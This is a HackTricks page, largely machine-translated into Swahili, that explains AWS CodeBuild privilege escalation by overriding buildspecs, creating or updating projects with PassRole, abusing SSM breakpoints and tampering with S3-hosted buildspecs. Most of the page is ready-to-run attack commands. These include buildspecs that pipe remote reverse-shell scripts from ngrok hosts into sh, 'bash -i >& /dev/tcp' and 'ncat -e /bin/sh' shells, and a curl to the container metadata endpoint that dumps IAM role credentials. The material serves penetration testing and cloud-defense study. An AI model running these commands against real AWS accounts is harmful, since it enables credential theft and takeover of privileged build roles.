AWS - Codebuild Privesc

Reading time: 9 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

codebuild

Pata taarifa zaidi katika:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Hata kwa ruhusa moja tu kati ya hizi inatosha kusababisha build kwa buildspec mpya na kuiba token ya iam role iliyoteuliwa kwa project:

bash
cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml

Kumbuka: Tofauti kati ya amri hizi mbili ni kwamba:

  • StartBuild huanzisha kazi moja ya build ikitumia buildspec.yml maalum.
  • StartBuildBatch inakuwezesha kuanza kundi la builds, kwa maandalizi tata zaidi (kama kuendesha builds nyingi kwa wakati mmoja).

Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa AWS Codebuild roles zilizoambatishwa.

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Mshambuliaji aliye na ruhusa za iam:PassRole, codebuild:CreateProject, na codebuild:StartBuild au codebuild:StartBuildBatch angeweza kufanya privesc kwa codebuild IAM role yoyote kwa kuunda moja inayoendesha.

bash
# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Potential Impact: Privesc ya moja kwa moja kwa yoyote AWS Codebuild role.

warning

In a Codebuild container kifaili /codebuild/output/tmp/env.sh kina env vars zote zinazohitajika ili kupata metadata credentials.

Kifaili hiki kina env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI ambayo ina URL path ya kufikia credentials. It will be something like this /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Ongeza hiyo kwenye URL http://169.254.170.2/ na utaweza ku-dump role credentials.

Zaidi ya hayo, pia lina env variable ECS_CONTAINER_METADATA_URI ambayo ina URL kamili ya kupata metadata info about the container.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kama ilivyo sehemu iliyopita, badala ya kuunda build project ukiweza kuubadilisha, unaweza kubainisha IAM Role na kuiba token

bash
REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Athari Inayoweza Kutokea: privesc ya moja kwa moja kwa role yoyote ya AWS Codebuild.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kama katika sehemu ya awali lakini bila ruhusa ya iam:PassRole, unaweza kutumia vibaya ruhusa hizi ili kubadilisha miradi ya Codebuild iliyopo na kufikia role walizo tayari wamepewa.

sh
REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Athari Inayoweza Kutokea: Privesc moja kwa moja kwa AWS Codebuild roles zilizounganishwa.

SSM

Kama una ruhusa za kutosha kuanzisha kikao cha ssm, inawezekana kuingia ndani ya mradi wa Codebuild unaojengwa.

The codebuild project will need to have a breakpoint:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

Na kisha:

bash
aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

Kwa taarifa zaidi check the docs.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

An attacker ambaye ana uwezo wa kuanzisha/kuanzisha upya build ya mradi maalum wa CodeBuild ambao unaweka faili yake buildspec.yml kwenye S3 bucket ambayo attacker ana haki ya kuandika, anaweza kupata utekelezaji wa amri ndani ya mchakato wa CodeBuild.

Kumbuka: uongezeko huu wa uwezo unahusiana tu ikiwa CodeBuild worker ana role tofauti, ikiwezekana yenye ustahiki zaidi, kuliko ile ya attacker.

bash
aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Unaweza kutumia kitu kama hiki buildspec ili kupata reverse shell:

buildspec.yml
version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impact: Direct privesc kwa role inayotumiwa na worker wa AWS CodeBuild ambayo kawaida ina ruhusa za juu.

warning

Kumbuka kuwa buildspec inaweza kutegemewa kuwa katika muundo wa zip, hivyo mshambuliaji atahitaji kupakua, kuunzip, kubadilisha buildspec.yml kutoka kwenye root directory, kuzipisha tena na kupakia

Maelezo zaidi yanaweza kupatikana hapa.

Potential Impact: Direct privesc kwa AWS Codebuild roles zilizoambatishwa.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks